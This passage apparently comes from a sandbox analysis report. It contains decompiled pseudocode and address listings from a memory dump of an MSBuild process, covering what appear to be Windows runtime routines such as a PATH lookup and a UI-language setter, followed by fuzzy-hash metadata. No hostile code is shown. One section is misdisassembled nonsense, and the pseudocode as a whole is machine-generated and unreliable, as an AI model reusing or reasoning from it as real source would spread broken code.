                                            													if(_v36 == 0) {
                                            														goto L45;
                                            													} else {
                                            														E0104F3E0(_t323, _v76, _v36);
                                            														_t271 = _v36;
                                            													}
                                            													L26:
                                            													_t338 = _t338 + 0xc;
                                            													_t323 = _t323 + (_t271 >> 1) * 2 + 2;
                                            													__eflags = _t323;
                                            													L27:
                                            													_push(0x3b);
                                            													_pop(_t273);
                                            													 *((short*)(_t323 - 2)) = _t273;
                                            													goto L28;
                                            												case 6:
                                            													__ebx =  *0x10f575c;
                                            													__eflags = __ebx - 0x10f575c;
                                            													if(__ebx != 0x10f575c) {
                                            														_push(0x3b);
                                            														_pop(__esi);
                                            														do {
                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                            															E0104F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                            															__edi = __edi + __eax * 2;
                                            															__edi = __edi + 2;
                                            															 *(__edi - 2) = __si;
                                            															__ebx =  *__ebx;
                                            															__eflags = __ebx - 0x10f575c;
                                            														} while (__ebx != 0x10f575c);
                                            														__esi = _v52;
                                            														__ecx = _v16;
                                            														__edx = _v32;
                                            													}
                                            													__ebx = _v56;
                                            													goto L29;
                                            												case 7:
                                            													 *0x10f8478 & 0x0000ffff = E0104F3E0(__edi,  *0x10f847c,  *0x10f8478 & 0x0000ffff);
                                            													__eax =  *0x10f8478 & 0x0000ffff;
                                            													__eax = ( *0x10f8478 & 0x0000ffff) >> 1;
                                            													__eflags = _a8;
                                            													__edi = __edi + __eax * 2;
                                            													if(_a8 != 0) {
                                            														__ecx = __edi;
                                            														__eax = E010939F2(__ecx);
                                            														__edi = __eax;
                                            													}
                                            													goto L28;
                                            												case 8:
                                            													__eax = 0;
                                            													 *(__edi - 2) = __ax;
                                            													 *0x10f6e58 & 0x0000ffff = E0104F3E0(__edi,  *0x10f6e5c,  *0x10f6e58 & 0x0000ffff);
                                            													 *(__esi + 0x38) = __edi;
                                            													__eax =  *0x10f6e58 & 0x0000ffff;
                                            													__eax = ( *0x10f6e58 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													__edi = __edi + 2;
                                            													L28:
                                            													_t294 = _v16;
                                            													_t310 = _v32;
                                            													L29:
                                            													_t282 = _t282 + 4;
                                            													__eflags = _t282;
                                            													_v56 = _t282;
                                            													goto L30;
                                            											}
                                            										}
                                            									}
                                            									goto L108;
                                            									L30:
                                            									_t294 = _t294 + 1;
                                            									_v16 = _t294;
                                            									__eflags = _t294 - _v48;
                                            								} while (_t294 < _v48);
                                            								goto L31;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					while(1) {
                                            						L1:
                                            						_t241 =  *(_v60 + _t321 * 4);
                                            						if(_t241 > 8) {
                                            							break;
                                            						}
                                            						switch( *((intOrPtr*)(_t241 * 4 +  &M01032935))) {
                                            							case 0:
                                            								__ax =  *0x10f8488;
                                            								__eflags = __ax;
                                            								if(__ax != 0) {
                                            									__eax = __ax & 0x0000ffff;
                                            									__ebx = __ebx + 2;
                                            									__eflags = __ebx;
                                            									goto L53;
                                            								}
                                            								goto L14;
                                            							case 1:
                                            								L44:
                                            								_t310 =  &_v64;
                                            								_v80 = E01032E3E(0,  &_v64);
                                            								_t282 = _t282 + _v64 + 2;
                                            								goto L13;
                                            							case 2:
                                            								__eax =  *0x10f8480 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10f8480;
                                            									goto L80;
                                            								}
                                            								goto L14;
                                            							case 3:
                                            								__eax = E0101EEF0(0x10f79a0);
                                            								__eax =  &_v44;
                                            								_push(__eax);
                                            								_push(0);
                                            								_push(0);
                                            								_push(4);
                                            								_push(L"PATH");
                                            								_push(0);
                                            								L57();
                                            								__esi = __eax;
                                            								_v68 = __esi;
                                            								__eflags = __esi - 0xc0000023;
                                            								if(__esi != 0xc0000023) {
                                            									L10:
                                            									__eax = E0101EB70(__ecx, 0x10f79a0);
                                            									__eflags = __esi - 0xc0000100;
                                            									if(__esi == 0xc0000100) {
                                            										_v44 = _v44 & 0x00000000;
                                            										__eax = 0;
                                            										_v68 = 0;
                                            										goto L13;
                                            									} else {
                                            										__eflags = __esi;
                                            										if(__esi < 0) {
                                            											L32:
                                            											_t215 = _v72;
                                            											__eflags = _t215;
                                            											if(_t215 != 0) {
                                            												L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                            											}
                                            											_t216 = _v52;
                                            											__eflags = _t216;
                                            											if(_t216 != 0) {
                                            												__eflags = _t329;
                                            												if(_t329 < 0) {
                                            													L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                            													_t216 = 0;
                                            												}
                                            											}
                                            											goto L36;
                                            										} else {
                                            											__eax = _v44;
                                            											__ebx = __ebx + __eax * 2;
                                            											__ebx = __ebx + 2;
                                            											__eflags = __ebx;
                                            											L13:
                                            											_t290 = _v36;
                                            											goto L14;
                                            										}
                                            									}
                                            								} else {
                                            									__eax = _v44;
                                            									__ecx =  *0x10f7b9c; // 0x0
                                            									_v44 + _v44 =  *[fs:0x30];
                                            									__ecx = __ecx + 0x180000;
                                            									__eax = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                            									_v72 = __eax;
                                            									__eflags = __eax;
                                            									if(__eax == 0) {
                                            										__eax = E0101EB70(__ecx, 0x10f79a0);
                                            										__eax = _v52;
                                            										L36:
                                            										_pop(_t322);
                                            										_pop(_t330);
                                            										__eflags = _v8 ^ _t334;
                                            										_pop(_t283);
                                            										return E0104B640(_t216, _t283, _v8 ^ _t334, _t310, _t322, _t330);
                                            									} else {
                                            										__ecx =  &_v44;
                                            										_push(__ecx);
                                            										_push(_v44);
                                            										_push(__eax);
                                            										_push(4);
                                            										_push(L"PATH");
                                            										_push(0);
                                            										L57();
                                            										__esi = __eax;
                                            										_v68 = __eax;
                                            										goto L10;
                                            									}
                                            								}
                                            								goto L108;
                                            							case 4:
                                            								__ebx = __ebx + 4;
                                            								goto L14;
                                            							case 5:
                                            								_t278 = _v56;
                                            								if(_v56 != 0) {
                                            									_t310 =  &_v36;
                                            									_t280 = E01032E3E(_t278,  &_v36);
                                            									_t290 = _v36;
                                            									_v76 = _t280;
                                            								}
                                            								if(_t290 == 0) {
                                            									goto L44;
                                            								} else {
                                            									_t282 = _t282 + 2 + _t290;
                                            								}
                                            								goto L14;
                                            							case 6:
                                            								__eax =  *0x10f5764 & 0x0000ffff;
                                            								goto L53;
                                            							case 7:
                                            								__eax =  *0x10f8478 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = _a8;
                                            								if(_a8 != 0) {
                                            									__ebx = __ebx + 0x16;
                                            									__ebx = __ebx + __eax;
                                            								}
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10f8478;
                                            									L80:
                                            									_v32 = __eax;
                                            								}
                                            								goto L14;
                                            							case 8:
                                            								__eax =  *0x10f6e58 & 0x0000ffff;
                                            								__eax = ( *0x10f6e58 & 0x0000ffff) + 2;
                                            								L53:
                                            								__ebx = __ebx + __eax;
                                            								L14:
                                            								_t321 = _t321 + 1;
                                            								if(_t321 >= _v48) {
                                            									goto L16;
                                            								} else {
                                            									_t310 = _v37;
                                            									goto L1;
                                            								}
                                            								goto L108;
                                            						}
                                            					}
                                            					L56:
                                            					_t295 = 0x25;
                                            					asm("int 0x29");
                                            					asm("out 0x28, al");
                                            					asm("o16 sub [ebx], al");
                                            					asm("daa");
                                            					_t245 = _t241 +  *_t295 + _t338 +  *_t295 +  *[es:ecx];
                                            					_t331 = _t328 + 1;
                                            					 *_t282 =  *_t282 - _t245;
                                            					 *0x1f010326 =  *0x1f010326 + _t245;
                                            					_pop(_t286);
                                            					_pop(es);
                                            					 *((intOrPtr*)(_t245 +  &_a1530200319)) =  *((intOrPtr*)(_t245 +  &_a1530200319)) + _t310;
                                            					_pop(es);
                                            					 *_t310 =  *_t310 + _t245;
                                            					 *_t286 =  *_t286 - _t245;
                                            					 *((intOrPtr*)(_t245 - 0x9fefcd8)) =  *((intOrPtr*)(_t245 - 0x9fefcd8)) + _t245;
                                            					asm("daa");
                                            					_t246 = _t245 +  *_t295;
                                            					 *_t286 =  *_t286 - _t246;
                                            					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t295;
                                            					asm("daa");
                                            					asm("fcomp dword [ebx+0x7]");
                                            					 *((intOrPtr*)(_t246 +  *_t295 +  *_t295 +  &_a1546911999)) =  *((intOrPtr*)(_t246 +  *_t295 +  *_t295 +  &_a1546911999)) + _t331;
                                            					es = ds;
                                            					_t340 = _t338 + _t295;
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(0x20);
                                            					_push(0x10dff00);
                                            					E0105D08C(_t286, _t323, _t331);
                                            					_v44 =  *[fs:0x18];
                                            					_t324 = 0;
                                            					 *_a24 = 0;
                                            					_t287 = _a12;
                                            					__eflags = _t287;
                                            					if(_t287 == 0) {
                                            						_t251 = 0xc0000100;
                                            					} else {
                                            						_v8 = 0;
                                            						_t332 = 0xc0000100;
                                            						_v52 = 0xc0000100;
                                            						_t253 = 4;
                                            						while(1) {
                                            							_v40 = _t253;
                                            							__eflags = _t253;
                                            							if(_t253 == 0) {
                                            								break;
                                            							}
                                            							_t300 = _t253 * 0xc;
                                            							_v48 = _t300;
                                            							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0xfe1664));
                                            							if(__eflags <= 0) {
                                            								if(__eflags == 0) {
                                            									_t268 = E0104E5C0(_a8,  *((intOrPtr*)(_t300 + 0xfe1668)), _t287);
                                            									_t340 = _t340 + 0xc;
                                            									__eflags = _t268;
                                            									if(__eflags == 0) {
                                            										_t332 = E010851BE(_t287,  *((intOrPtr*)(_v48 + 0xfe166c)), _a16, _t324, _t332, __eflags, _a20, _a24);
                                            										_v52 = _t332;
                                            										break;
                                            									} else {
                                            										_t253 = _v40;
                                            										goto L62;
                                            									}
                                            									goto L70;
                                            								} else {
                                            									L62:
                                            									_t253 = _t253 - 1;
                                            									continue;
                                            								}
                                            							}
                                            							break;
                                            						}
                                            						_v32 = _t332;
                                            						__eflags = _t332;
                                            						if(_t332 < 0) {
                                            							__eflags = _t332 - 0xc0000100;
                                            							if(_t332 == 0xc0000100) {
                                            								_t296 = _a4;
                                            								__eflags = _t296;
                                            								if(_t296 != 0) {
                                            									_v36 = _t296;
                                            									__eflags =  *_t296 - _t324;
                                            									if( *_t296 == _t324) {
                                            										_t332 = 0xc0000100;
                                            										goto L76;
                                            									} else {
                                            										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                            										_t255 =  *((intOrPtr*)(_t312 + 0x10));
                                            										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t296;
                                            										if( *((intOrPtr*)(_t255 + 0x48)) == _t296) {
                                            											__eflags =  *(_t312 + 0x1c);
                                            											if( *(_t312 + 0x1c) == 0) {
                                            												L106:
                                            												_t332 = E01032AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                                            												_v32 = _t332;
                                            												__eflags = _t332 - 0xc0000100;
                                            												if(_t332 != 0xc0000100) {
                                            													goto L69;
                                            												} else {
                                            													_t324 = 1;
                                            													_t296 = _v36;
                                            													goto L75;
                                            												}
                                            											} else {
                                            												_t258 = E01016600( *(_t312 + 0x1c));
                                            												__eflags = _t258;
                                            												if(_t258 != 0) {
                                            													goto L106;
                                            												} else {
                                            													_t296 = _a4;
                                            													goto L75;
                                            												}
                                            											}
                                            										} else {
                                            											L75:
                                            											_t332 = E01032C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
                                            											L76:
                                            											_v32 = _t332;
                                            											goto L69;
                                            										}
                                            									}
                                            									goto L108;
                                            								} else {
                                            									E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            									_v8 = 1;
                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                            									_t332 = _a24;
                                            									_t265 = E01032AE4( &_v36, _a8, _t287, _a16, _a20, _t332);
                                            									_v32 = _t265;
                                            									__eflags = _t265 - 0xc0000100;
                                            									if(_t265 == 0xc0000100) {
                                            										_v32 = E01032C50(_v36, _a8, _t287, _a16, _a20, _t332, 1);
                                            									}
                                            									_v8 = _t324;
                                            									E01032ACB();
                                            								}
                                            							}
                                            						}
                                            						L69:
                                            						_v8 = 0xfffffffe;
                                            						_t251 = _t332;
                                            					}
                                            					L70:
                                            					return E0105D0D1(_t251);
                                            				}
                                            				L108:
                                            			}





















































                                            0x01032584
                                            0x01032586
                                            0x01032590
                                            0x01032596
                                            0x01032597
                                            0x01032598
                                            0x01032599
                                            0x0103259e
                                            0x010325a4
                                            0x010325a9
                                            0x010325ac
                                            0x010325ae
                                            0x010325b1
                                            0x010325b2
                                            0x010325b5
                                            0x010325b8
                                            0x010325bb
                                            0x010325bc
                                            0x010325bf
                                            0x010325c2
                                            0x010325c5
                                            0x010325c6
                                            0x010325cb
                                            0x010325ce
                                            0x010325d8
                                            0x010325dd
                                            0x010325de
                                            0x010325e1
                                            0x010325e3
                                            0x010325e9
                                            0x010326da
                                            0x010326da
                                            0x010326dd
                                            0x010326e2
                                            0x01075b56
                                            0x00000000
                                            0x010326e8
                                            0x010326f9
                                            0x010326fb
                                            0x010326fe
                                            0x01032700
                                            0x01075b60
                                            0x00000000
                                            0x01032706
                                            0x01032706
                                            0x0103270a
                                            0x0103270a
                                            0x0103270d
                                            0x01032713
                                            0x01032716
                                            0x01032718
                                            0x0103271c
                                            0x0103271e
                                            0x01075b6c
                                            0x01075b6f
                                            0x01075b7f
                                            0x01075b89
                                            0x01075b8e
                                            0x01075b93
                                            0x01075b96
                                            0x01075b9c
                                            0x01075ba0
                                            0x01075ba3
                                            0x01075bab
                                            0x01075bb0
                                            0x01075bb3
                                            0x01075bb3
                                            0x01075ba3
                                            0x01032724
                                            0x01032726
                                            0x01032729
                                            0x0103272c
                                            0x0103279d
                                            0x0103279d
                                            0x010327a0
                                            0x010327a2
                                            0x00000000
                                            0x0103272e
                                            0x0103272e
                                            0x01032731
                                            0x01032734
                                            0x01032734
                                            0x01032736
                                            0x01075bc1
                                            0x01075bc1
                                            0x01075bc4
                                            0x00000000
                                            0x01075bca
                                            0x01075bca
                                            0x01075bcd
                                            0x00000000
                                            0x01075bd3
                                            0x00000000
                                            0x01075bd3
                                            0x01075bcd
                                            0x0103273c
                                            0x0103273c
                                            0x01032742
                                            0x01032747
                                            0x0103274a
                                            0x0103274d
                                            0x01032750
                                            0x00000000
                                            0x01032756
                                            0x01032756
                                            0x00000000
                                            0x01032902
                                            0x01032908
                                            0x0103290b
                                            0x00000000
                                            0x01032911
                                            0x0103291c
                                            0x01032921
                                            0x00000000
                                            0x01032921
                                            0x00000000
                                            0x00000000
                                            0x01032880
                                            0x01032887
                                            0x0103288c
                                            0x00000000
                                            0x00000000
                                            0x01032805
                                            0x0103280a
                                            0x01032814
                                            0x01032816
                                            0x00000000
                                            0x00000000
                                            0x0103281e
                                            0x01032821
                                            0x01032823
                                            0x00000000
                                            0x01032829
                                            0x01032829
                                            0x01032831
                                            0x0103283c
                                            0x0103283e
                                            0x00000000
                                            0x0103283e
                                            0x00000000
                                            0x00000000
                                            0x0103284e
                                            0x01032850
                                            0x01032851
                                            0x01032854
                                            0x01032857
                                            0x0103285a
                                            0x0103285c
                                            0x0103285d
                                            0x00000000
                                            0x00000000
                                            0x0103275d
                                            0x01032761
                                            0x00000000
                                            0x01032767
                                            0x0103276e
                                            0x01032773
                                            0x01032773
                                            0x01032776
                                            0x01032778
                                            0x0103277e
                                            0x0103277e
                                            0x01032781
                                            0x01032781
                                            0x01032783
                                            0x01032784
                                            0x00000000
                                            0x00000000
                                            0x01075bd8
                                            0x01075bde
                                            0x01075be4
                                            0x01075be6
                                            0x01075be8
                                            0x01075be9
                                            0x01075bee
                                            0x01075bf8
                                            0x01075bff
                                            0x01075c01
                                            0x01075c04
                                            0x01075c07
                                            0x01075c0b
                                            0x01075c0d
                                            0x01075c0d
                                            0x01075c15
                                            0x01075c18
                                            0x01075c1b
                                            0x01075c1b
                                            0x01075c1e
                                            0x00000000
                                            0x00000000
                                            0x010328c3
                                            0x010328c8
                                            0x010328d2
                                            0x010328d4
                                            0x010328d8
                                            0x010328db
                                            0x01075c26
                                            0x01075c28
                                            0x01075c2d
                                            0x01075c2d
                                            0x00000000
                                            0x00000000
                                            0x01075c34
                                            0x01075c36
                                            0x01075c49
                                            0x01075c4e
                                            0x01075c54
                                            0x01075c5b
                                            0x01075c5d
                                            0x01075c60
                                            0x01032788
                                            0x01032788
                                            0x0103278b
                                            0x0103278e
                                            0x0103278e
                                            0x0103278e
                                            0x01032791
                                            0x00000000
                                            0x00000000
                                            0x01032756
                                            0x01032750
                                            0x00000000
                                            0x01032794
                                            0x01032794
                                            0x01032795
                                            0x01032798
                                            0x01032798
                                            0x00000000
                                            0x01032734
                                            0x0103272c
                                            0x01032700
                                            0x010325ef
                                            0x010325ef
                                            0x010325ef
                                            0x010325f2
                                            0x010325f8
                                            0x00000000
                                            0x00000000
                                            0x010325fe
                                            0x00000000
                                            0x010328e6
                                            0x010328ec
                                            0x010328ef
                                            0x010328f5
                                            0x010328f8
                                            0x010328f8
                                            0x00000000
                                            0x010328f8
                                            0x00000000
                                            0x00000000
                                            0x01032866
                                            0x01032866
                                            0x01032876
                                            0x01032879
                                            0x00000000
                                            0x00000000
                                            0x010327e0
                                            0x010327e7
                                            0x010327e9
                                            0x010327eb
                                            0x01075afd
                                            0x00000000
                                            0x01075afd
                                            0x00000000
                                            0x00000000
                                            0x01032633
                                            0x01032638
                                            0x0103263b
                                            0x0103263c
                                            0x0103263e
                                            0x01032640
                                            0x01032642
                                            0x01032647
                                            0x01032649
                                            0x0103264e
                                            0x01032650
                                            0x01032653
                                            0x01032659
                                            0x010326a2
                                            0x010326a7
                                            0x010326ac
                                            0x010326b2
                                            0x01075b11
                                            0x01075b15
                                            0x01075b17
                                            0x00000000
                                            0x010326b8
                                            0x010326b8
                                            0x010326ba
                                            0x010327a6
                                            0x010327a6
                                            0x010327a9
                                            0x010327ab
                                            0x010327b9
                                            0x010327b9
                                            0x010327be
                                            0x010327c1
                                            0x010327c3
                                            0x010327c5
                                            0x010327c7
                                            0x01075c74
                                            0x01075c79
                                            0x01075c79
                                            0x010327c7
                                            0x00000000
                                            0x010326c0
                                            0x010326c0
                                            0x010326c3
                                            0x010326c6
                                            0x010326c6
                                            0x010326c9
                                            0x010326c9
                                            0x00000000
                                            0x010326c9
                                            0x010326ba
                                            0x0103265b
                                            0x0103265b
                                            0x0103265e
                                            0x01032667
                                            0x0103266d
                                            0x01032677
                                            0x0103267c
                                            0x0103267f
                                            0x01032681
                                            0x01075b49
                                            0x01075b4e
                                            0x010327cd
                                            0x010327d0
                                            0x010327d1
                                            0x010327d2
                                            0x010327d4
                                            0x010327dd
                                            0x01032687
                                            0x01032687
                                            0x0103268a
                                            0x0103268b
                                            0x0103268e
                                            0x0103268f
                                            0x01032691
                                            0x01032696
                                            0x01032698
                                            0x0103269d
                                            0x0103269f
                                            0x00000000
                                            0x0103269f
                                            0x01032681
                                            0x00000000
                                            0x00000000
                                            0x01032846
                                            0x00000000
                                            0x00000000
                                            0x01032605
                                            0x0103260a
                                            0x0103260c
                                            0x01032611
                                            0x01032616
                                            0x01032619
                                            0x01032619
                                            0x0103261e
                                            0x00000000
                                            0x01032624
                                            0x01032627
                                            0x01032627
                                            0x00000000
                                            0x00000000
                                            0x01075b1f
                                            0x00000000
                                            0x00000000
                                            0x01032894
                                            0x0103289b
                                            0x0103289d
                                            0x010328a1
                                            0x01075b2b
                                            0x01075b2e
                                            0x01075b2e
                                            0x010328a7
                                            0x010328a9
                                            0x01075b04
                                            0x01075b09
                                            0x01075b09
                                            0x01075b09
                                            0x00000000
                                            0x00000000
                                            0x01075b35
                                            0x01075b3c
                                            0x010328fb
                                            0x010328fb
                                            0x010326cc
                                            0x010326cc
                                            0x010326d0
                                            0x00000000
                                            0x010326d2
                                            0x010326d2
                                            0x00000000
                                            0x010326d2
                                            0x00000000
                                            0x00000000
                                            0x010325fe
                                            0x0103292d
                                            0x0103292f
                                            0x01032930
                                            0x01032935
                                            0x01032939
                                            0x0103293e
                                            0x01032941
                                            0x01032945
                                            0x01032946
                                            0x01032948
                                            0x0103294e
                                            0x0103294f
                                            0x01032950
                                            0x01032957
                                            0x01032958
                                            0x0103295a
                                            0x0103295c
                                            0x01032962
                                            0x01032963
                                            0x01032966
                                            0x01032968
                                            0x0103296e
                                            0x01032971
                                            0x01032974
                                            0x0103297b
                                            0x0103297c
                                            0x0103297e
                                            0x0103297f
                                            0x01032980
                                            0x01032981
                                            0x01032982
                                            0x01032983
                                            0x01032984
                                            0x01032985
                                            0x01032986
                                            0x01032987
                                            0x01032988
                                            0x01032989
                                            0x0103298a
                                            0x0103298b
                                            0x0103298c
                                            0x0103298d
                                            0x0103298e
                                            0x0103298f
                                            0x01032990
                                            0x01032992
                                            0x01032997
                                            0x010329a3
                                            0x010329a6
                                            0x010329ab
                                            0x010329ad
                                            0x010329b0
                                            0x010329b2
                                            0x01075c80
                                            0x010329b8
                                            0x010329b8
                                            0x010329bb
                                            0x010329c0
                                            0x010329c5
                                            0x010329c6
                                            0x010329c6
                                            0x010329c9
                                            0x010329cb
                                            0x00000000
                                            0x00000000
                                            0x010329cd
                                            0x010329d0
                                            0x010329d9
                                            0x010329db
                                            0x010329dd
                                            0x01032a7f
                                            0x01032a84
                                            0x01032a87
                                            0x01032a89
                                            0x01075ca1
                                            0x01075ca3
                                            0x00000000
                                            0x01032a8f
                                            0x01032a8f
                                            0x00000000
                                            0x01032a8f
                                            0x00000000
                                            0x010329e3
                                            0x010329e3
                                            0x010329e3
                                            0x00000000
                                            0x010329e3
                                            0x010329dd
                                            0x00000000
                                            0x010329db
                                            0x010329e6
                                            0x010329e9
                                            0x010329eb
                                            0x010329ed
                                            0x010329f3
                                            0x010329f5
                                            0x010329f8
                                            0x010329fa
                                            0x01032a97
                                            0x01032a9a
                                            0x01032a9d
                                            0x01032add
                                            0x00000000
                                            0x01032a9f
                                            0x01032aa2
                                            0x01032aa5
                                            0x01032aa8
                                            0x01032aab
                                            0x01075cab
                                            0x01075caf
                                            0x01075cc5
                                            0x01075cda
                                            0x01075cdc
                                            0x01075cdf
                                            0x01075ce5
                                            0x00000000
                                            0x01075ceb
                                            0x01075ced
                                            0x01075cee
                                            0x00000000
                                            0x01075cee
                                            0x01075cb1
                                            0x01075cb4
                                            0x01075cb9
                                            0x01075cbb
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbd
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbb
                                            0x01032ab1
                                            0x01032ab1
                                            0x01032ac4
                                            0x01032ac6
                                            0x01032ac6
                                            0x00000000
                                            0x01032ac6
                                            0x01032aab
                                            0x00000000
                                            0x01032a00
                                            0x01032a09
                                            0x01032a0e
                                            0x01032a21
                                            0x01032a24
                                            0x01032a35
                                            0x01032a3a
                                            0x01032a3d
                                            0x01032a42
                                            0x01032a59
                                            0x01032a59
                                            0x01032a5c
                                            0x01032a5f
                                            0x01032a5f
                                            0x010329fa
                                            0x010329f3
                                            0x01032a64
                                            0x01032a64
                                            0x01032a6b
                                            0x01032a6b
                                            0x01032a6d
                                            0x01032a72
                                            0x01032a72
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: d19912a21a1fd2e9cf73c168848423dba3cb566c0cd3d31c2fed1102e5cb1302
                                            • Instruction ID: 5e097b6837788d62d9ae39ed44373ac4d051e7958991c37aab78170d28c2c84d
                                            • Opcode Fuzzy Hash: d19912a21a1fd2e9cf73c168848423dba3cb566c0cd3d31c2fed1102e5cb1302
                                            • Instruction Fuzzy Hash: B4C181B5E00219DBDB25DF99D881BFDBBF9FF88740F048069E981AB250D734A941CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0103FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                            				char _v5;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				char _v16;
                                            				char _v17;
                                            				char _v20;
                                            				signed int _v24;
                                            				char _v28;
                                            				char _v32;
                                            				signed int _v40;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t73;
                                            				intOrPtr* _t75;
                                            				signed int _t77;
                                            				signed int _t79;
                                            				signed int _t81;
                                            				intOrPtr _t83;
                                            				intOrPtr _t85;
                                            				intOrPtr _t86;
                                            				signed int _t91;
                                            				signed int _t94;
                                            				signed int _t95;
                                            				signed int _t96;
                                            				signed int _t106;
                                            				signed int _t108;
                                            				signed int _t114;
                                            				signed int _t116;
                                            				signed int _t118;
                                            				signed int _t122;
                                            				signed int _t123;
                                            				void* _t129;
                                            				signed int _t130;
                                            				void* _t132;
                                            				intOrPtr* _t134;
                                            				signed int _t138;
                                            				signed int _t141;
                                            				signed int _t147;
                                            				intOrPtr _t153;
                                            				signed int _t154;
                                            				signed int _t155;
                                            				signed int _t170;
                                            				void* _t174;
                                            				signed int _t176;
                                            				signed int _t177;
                                            
                                            				_t129 = __ebx;
                                            				_push(_t132);
                                            				_push(__esi);
                                            				_t174 = _t132;
                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                            				if(_t73 >= 0) {
                                            					L5:
                                            					return _t73;
                                            				} else {
                                            					E0101EEF0(0x10f7b60);
                                            					_t134 =  *0x10f7b84; // 0x771a7b80
                                            					_t2 = _t174 + 0x24; // 0x24
                                            					_t75 = _t2;
                                            					if( *_t134 != 0x10f7b80) {
                                            						_push(3);
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x10f7b60);
                                            						_t170 = _v8;
                                            						_v28 = 0;
                                            						_v40 = 0;
                                            						_v24 = 0;
                                            						_v17 = 0;
                                            						_v32 = 0;
                                            						__eflags = _t170 & 0xffff7cf2;
                                            						if((_t170 & 0xffff7cf2) != 0) {
                                            							L43:
                                            							_t77 = 0xc000000d;
                                            						} else {
                                            							_t79 = _t170 & 0x0000000c;
                                            							__eflags = _t79;
                                            							if(_t79 != 0) {
                                            								__eflags = _t79 - 0xc;
                                            								if(_t79 == 0xc) {
                                            									goto L43;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							} else {
                                            								_t170 = _t170 | 0x00000008;
                                            								__eflags = _t170;
                                            								L9:
                                            								_t81 = _t170 & 0x00000300;
                                            								__eflags = _t81 - 0x300;
                                            								if(_t81 == 0x300) {
                                            									goto L43;
                                            								} else {
                                            									_t138 = _t170 & 0x00000001;
                                            									__eflags = _t138;
                                            									_v24 = _t138;
                                            									if(_t138 != 0) {
                                            										__eflags = _t81;
                                            										if(_t81 != 0) {
                                            											goto L43;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									} else {
                                            										L11:
                                            										_push(_t129);
                                            										_t77 = E01016D90( &_v20);
                                            										_t130 = _t77;
                                            										__eflags = _t130;
                                            										if(_t130 >= 0) {
                                            											_push(_t174);
                                            											__eflags = _t170 & 0x00000301;
                                            											if((_t170 & 0x00000301) == 0) {
                                            												_t176 = _a8;
                                            												__eflags = _t176;
                                            												if(__eflags == 0) {
                                            													L64:
                                            													_t83 =  *[fs:0x18];
                                            													_t177 = 0;
                                            													__eflags =  *(_t83 + 0xfb8);
                                            													if( *(_t83 + 0xfb8) != 0) {
                                            														E010176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                            													}
                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                            													goto L15;
                                            												} else {
                                            													asm("sbb edx, edx");
                                            													_t114 = E010A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                            													__eflags = _t114;
                                            													if(_t114 < 0) {
                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                            														E0100B150();
                                            													}
                                            													_t116 = E010A6D81(_t176,  &_v16);
                                            													__eflags = _t116;
                                            													if(_t116 >= 0) {
                                            														__eflags = _v16 - 2;
                                            														if(_v16 < 2) {
                                            															L56:
                                            															_t118 = E010175CE(_v20, 5, 0);
                                            															__eflags = _t118;
